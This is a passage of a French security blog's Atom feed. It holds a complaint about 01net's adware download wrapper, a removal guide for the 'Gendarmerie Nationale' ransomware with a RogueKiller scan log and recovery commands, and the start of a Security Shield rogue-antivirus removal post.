&lt;a href="http://3.bp.blogspot.com/-_v_mxZTNxUk/T8z2S1z-4eI/AAAAAAAAAF4/ZL3c39EmRqo/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="422" src="http://3.bp.blogspot.com/-_v_mxZTNxUk/T8z2S1z-4eI/AAAAAAAAAF4/ZL3c39EmRqo/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;i&gt;Jusque là tout va bien&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-n-M4VAA44s8/T8z2riLPA5I/AAAAAAAAAGA/Br0hl7IZbSU/s1600/Capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="434" src="http://4.bp.blogspot.com/-n-M4VAA44s8/T8z2riLPA5I/AAAAAAAAAGA/Br0hl7IZbSU/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;i&gt;Allez, ça commence: &lt;b&gt;Toolbar Babylon&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-qZKqal2GCkY/T8z27SbBlNI/AAAAAAAAAGI/Oi9rF8kiiHM/s1600/Capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="426" src="http://1.bp.blogspot.com/-qZKqal2GCkY/T8z27SbBlNI/AAAAAAAAAGI/Oi9rF8kiiHM/s640/Capture3.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;i&gt;De la pub maintenant... On vous fait croire que ça mets des plombes à télécharger&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-K4YqGhzfo9E/T8z3GRAz1-I/AAAAAAAAAGQ/XvA4RpNBt48/s1600/Capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="444" src="http://2.bp.blogspot.com/-K4YqGhzfo9E/T8z3GRAz1-I/AAAAAAAAAGQ/XvA4RpNBt48/s640/Capture4.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;i&gt;Le must. De la pub vidéo en streaming!&amp;nbsp;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;i&gt;On fait croire que ça télécharge toujours...&amp;nbsp;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;i&gt;Le download se stoppe à 99% histoire de vous laisser voir la vidéo.&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;div style="background-color: #9fc5e8;"&gt;
&lt;b&gt;___________________________________&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Petit commentaire de ma part :&lt;br /&gt;
RogueKiller n'a jamais été téléchargé, le download n'a jamais repris après.&lt;br /&gt;
Je sais pas si leur truc est buggé...&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="background-color: #6fa8dc; text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;u&gt;Conclusion :&lt;/u&gt;&lt;/i&gt; On ne le répétera jamais assez.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-color: #6fa8dc; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Prenez vos logiciels sur les liens des développeurs!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: #6fa8dc; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="background-color: #6fa8dc; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Le seul lien officiel francophone de RogueKiller est ici:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: #6fa8dc; text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;a href="http://www.sur-la-toile.com/RogueKiller/" target="_blank"&gt;&lt;b&gt;http://www.sur-la-toile.com/RogueKiller/ &lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/s1GYk_ag5qY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/4267190718762917811/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/06/info-01net-comment-monetiser-sur-le-dos.html#comment-form" title="25 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/4267190718762917811?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/4267190718762917811?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/s1GYk_ag5qY/info-01net-comment-monetiser-sur-le-dos.html" title="[Info] 01net : Comment monétiser sur le dos des développeurs." /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-Yjxo6V8U-0w/T8z0ylx2hAI/AAAAAAAAAFw/-WHZSmKteb8/s72-c/Capture5.PNG" height="72" width="72" /><thr:total>25</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/06/info-01net-comment-monetiser-sur-le-dos.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAGRHg4eCp7ImA9WhNTFUk.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-8895565818645334388</id><published>2012-05-24T09:03:00.000-07:00</published><updated>2012-10-18T01:25:25.630-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-10-18T01:25:25.630-07:00</app:edited><title>[RansomWare] Gendarmerie Nationale</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer le ransomware&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;"Gendarmerie Nationale"&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-sA3JSvLS3dw/TuzIqzTB4dI/AAAAAAAAAFQ/XpUQgNVYMeA/s1600/Sans+titre+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="392" src="http://1.bp.blogspot.com/-sA3JSvLS3dw/TuzIqzTB4dI/AAAAAAAAAFQ/XpUQgNVYMeA/s640/Sans+titre+1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vs9FAtTIeMI/TglvNpI51EI/AAAAAAAAAC4/rJW-YCgmdzY/s1600/XPSecurity2011.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;Ce Ransomware / Screenlocker prend tout l'écran, empêchant tout action de l'utilisateur.&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;Il peut être présent sous plusieurs variantes:&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;&amp;nbsp;Ajout d'une clé RUN lui permettant de se relancer au démarrage du PC&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Remplacement du fichier &lt;b&gt;%windir% / explorer.exe&lt;/b&gt; avec copie préalable dans &lt;b&gt;%windir% / twexx32.dll&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Ajout d'un raccourci dans le dossier de démarrage&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;En fonction de ces variantes, plusieurs méthodes existent. Pour savoir quelle variante est présente (et la supprimer), suivre la démarche suivante:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;h3&gt;
&lt;i&gt;&lt;b&gt;Télécharger :&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style="color: #38761d;"&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;span style="background-color: white;"&gt;&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;a href="http://fr.malwarebytes.org/" target="_blank"&gt;Malwarebytes&lt;/a&gt;&lt;/span&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: #38761d;"&gt;&lt;a href="http://www.sur-la-toile.com/RogueKiller/" target="_blank"&gt;RogueKiller&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;
 &lt;div align="align" middle="middle" style="display: inline-block;"&gt;
&lt;div align="center" style="float: left;"&gt;
&lt;script type="text/javascript"&gt;&lt;!--
   google_ad_client = "ca-pub-1402516409062885";
   /* Blog content */
   google_ad_slot = "2223477569";
   google_ad_width = 336;
   google_ad_height = 280;
   //&lt;/script&gt;
   &lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
   &lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;/center&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;&lt;span style="background-color: #a2c4c9;"&gt;****** &lt;/span&gt;&lt;span style="background-color: #a2c4c9;"&gt;Variante utilisant une clé RUN&lt;i&gt; &lt;/i&gt;ou &lt;/span&gt;&lt;span style="background-color: #a2c4c9;"&gt;&lt;span style="background-color: #a2c4c9;"&gt;ajoutant un raccourci&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #a2c4c9;"&gt; ******&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style="background-color: white;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Démarrer en &lt;u&gt;&lt;b&gt;mode sans échec avec prise en charge réseau&lt;/b&gt;&lt;/u&gt;.&lt;b&gt; &lt;/b&gt;Si le malware est présent, ce n'est pas cette variante : passer à la suit&lt;b&gt;e&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer RogueKiller en mode &lt;b&gt;Scan puis Suppression&lt;/b&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant et être capable de redémarrer normalement: &lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V6.2.0 [12/12/2011] par Tigzy
&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com
&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
&lt;br /&gt;Blog: http://tigzyrk.blogspot.com
&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows Vista (6.0.6002 Service Pack 2) 32 bits version
&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;Demarrage : Mode normal
&lt;br /&gt;Utilisateur: **** [Droits d'admin]
&lt;br /&gt;Mode: Recherche -- Date : 17/12/2011 11:27:31
&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux: 0 ¤¤¤
&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;br /&gt;¤¤¤ Entrees de registre: 7 ¤¤¤
&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;[SUSP PATH] HKCU\[...]\Run : w25zxz84.exe (C:\Users\dary\AppData\Roaming\w25zxz84.exe) -&amp;gt; DELETE&lt;br /&gt;[SUSP PATH] 
HKUS\S-1-5-21-2280558674-1678247186-3373966309-1000[...]\Run : 
w25zxz84.exe (C:\Users\dary\AppData\Roaming\w25zxz84.exe) -&amp;gt; &lt;/span&gt;&lt;span style="font-size: x-small;"&gt;DELETE&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;[SUSP PATH] ctfmon.lnk @Lauro : 
C:\WINDOWS\system32\rundll32.exe|C:\DOCUME~1\ALLUSE~1\APPLIC~1\4454F1A831D76E378B738CBDF0422CE.exe.tmp
 -&amp;gt; DELETED&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;[HJ] HKLM\[...]\NewStartPanel : {59031a47-3f72-44a7-89c5-5595fe6b30ee} (1) -&amp;gt; &lt;/span&gt;&lt;span style="font-size: x-small;"&gt;DELETE&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;[HJ] HKCU\[...]\ClassicStartMenu : {59031a47-3f72-44a7-89c5-5595fe6b30ee} (1) -&amp;gt; &lt;/span&gt;&lt;span style="font-size: x-small;"&gt;DELETE&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -&amp;gt; &lt;/span&gt;&lt;span style="font-size: x-small;"&gt;DELETE&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;[HJ] HKCU\[...]\ClassicStartMenu : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -&amp;gt; &lt;/span&gt;&lt;span style="font-size: x-small;"&gt;DELETE&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;[HJ] HKCU\[...]\ClassicStartMenu : {645FF040-5081-101B-9F08-00AA002F954E} (1) -&amp;gt; &lt;/span&gt;&lt;span style="font-size: x-small;"&gt;DELETE&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp; Lancer un scan avec Malwarebytes&lt;b&gt; et tout supprimer&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="background-color: #a2c4c9;"&gt;****** Variante modifiant la clé SHELL ******&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
EDIT du 24/05/2012:&lt;br /&gt;
&lt;br /&gt;
Parfois le mode sans échec peut être inaccessible&lt;b&gt;. &lt;/b&gt;Si c'est le cas, alors nous sommes dans le cas d'une modification de la clé Shell. Il va falloir graver un live CD.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;RogueKiller peut maintenant désinfecter les systèmes depuis un live CD OTLPE&lt;/b&gt;.&lt;br /&gt;
Suivre la vidéo pour s'en débarrasser:&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Télécharger en plus &lt;span style="color: #0b5394;"&gt;&lt;a href="http://oldtimer.geekstogo.com/OTLPENet.exe"&gt;OTLPE&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: #0b5394;"&gt; &lt;b&gt;&lt;i&gt;&lt;span style="color: black;"&gt;et suivre&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt; les explications de la vidéo.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/w55mDdgyk_s/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/w55mDdgyk_s?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;


&lt;param name="bgcolor" value="#FFFFFF" /&gt;


&lt;embed width="600" height="375"  src="http://www.youtube.com/v/w55mDdgyk_s?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="background-color: #a2c4c9;"&gt;****** Variante remplaçant explorer.exe ******&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Si vous pensez être en présence de cette variante (méthodes précédentes n'ayant pas fonctionné), suivre la vidéo suivante pour le supprimer (remplacement de explorer.exe).&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Remarque : La méthode de la vidéo peut ne pas marcher. Si c'est le cas, voir en dessous.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/fLBF_3VhPYU/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/fLBF_3VhPYU?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;
















&lt;param name="bgcolor" value="#FFFFFF" /&gt;
















&lt;embed width="600" height="375"  src="http://www.youtube.com/v/fLBF_3VhPYU?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Le raccourci clavier &lt;b&gt;CTRL + ALT + PAUSE&lt;/b&gt; peut également marcher pour débloquer le bureau&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;div&gt;
La méthode de la vidéo ne marche pas tout le temps (en particulier avec des version récentes de IE). Si c'est le cas, il faut alors graver et démarrer sur un live CD (comme Ubuntu : &lt;a href="http://ubuntu-fr.org/telechargement"&gt;http://ubuntu-fr.org/telechargement&lt;/a&gt; , ou encore &lt;a href="http://oldtimer.geekstogo.com/OTLPENet.exe"&gt;OTLPE&lt;/a&gt;). Puis&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;b&gt;:&lt;/b&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;Une fois sur le live CD, aller dans le disque local appartenant à windows&lt;/li&gt;
&lt;li&gt;Trouver le fichier &lt;b&gt;C:/windows/twexx32.dll &lt;/b&gt;&lt;i&gt;(S'il n'existe pas, ne pas faire ce qui suit!)&lt;/i&gt;&lt;/li&gt;
&lt;li&gt;Supprimer &lt;b&gt;C:/windows/explorer.exe&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Renommer &lt;b&gt;twexx32.dll &lt;/b&gt;en&lt;b&gt; explorer.exe&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Redémarrer en mode normal, le problème doit être résolu&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;On peut également utiliser une autre méthode pour réaliser la même chose sans graver de live CD&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt;Démarrer en &lt;b&gt;mode sans échec &lt;span style="background-color: #6aa84f;"&gt;invite de commande&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Taper la commande suivante (si votre disque système est C:) et redémarrer:&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;&lt;span style="color: #073763;"&gt;copy /Y /B C:\windows\twexx32.dll /B C:\windows\explorer.exe&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/3BeLrv710nA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/8895565818645334388/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/12/ransomware-gendarmerie-nationale.html#comment-form" title="109 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/8895565818645334388?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/8895565818645334388?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/3BeLrv710nA/ransomware-gendarmerie-nationale.html" title="[RansomWare] Gendarmerie Nationale" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-sA3JSvLS3dw/TuzIqzTB4dI/AAAAAAAAAFQ/XpUQgNVYMeA/s72-c/Sans+titre+1.png" height="72" width="72" /><thr:total>109</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/12/ransomware-gendarmerie-nationale.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IFQHg5eCp7ImA9WhVRFEQ.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-4606831509788443057</id><published>2012-03-23T03:45:00.002-07:00</published><updated>2012-03-23T03:45:11.620-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-23T03:45:11.620-07:00</app:edited><title>[Rogue] Security Shield</title><content type="html">&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer Security Shield&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Security Shield&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ltvRBRrw_GA/T2xSd7Mq65I/AAAAAAAAAFg/7iGRe2DpXtw/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="512" src="http://1.bp.blogspot.com/-ltvRBRrw_GA/T2xSd7Mq65I/AAAAAAAAAFg/7iGRe2DpXtw/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-dyQaOpMW0UE/Tir4RlfaOgI/AAAAAAAAAD8/dTpdiLw9Yus/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/e1L95LchFME/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/e1L95LchFME?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;

&lt;param name="bgcolor" value="#FFFFFF" /&gt;

&lt;embed width="600" height="375"  src="http://www.youtube.com/v/e1L95LchFME?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;Mise à jour du 23/03/2012:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Ce
 Rogue à lancé une nouvelle campagne ces derniers jours, employant 
exactement le même fonctionnel, le même nom et la même 
interface.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
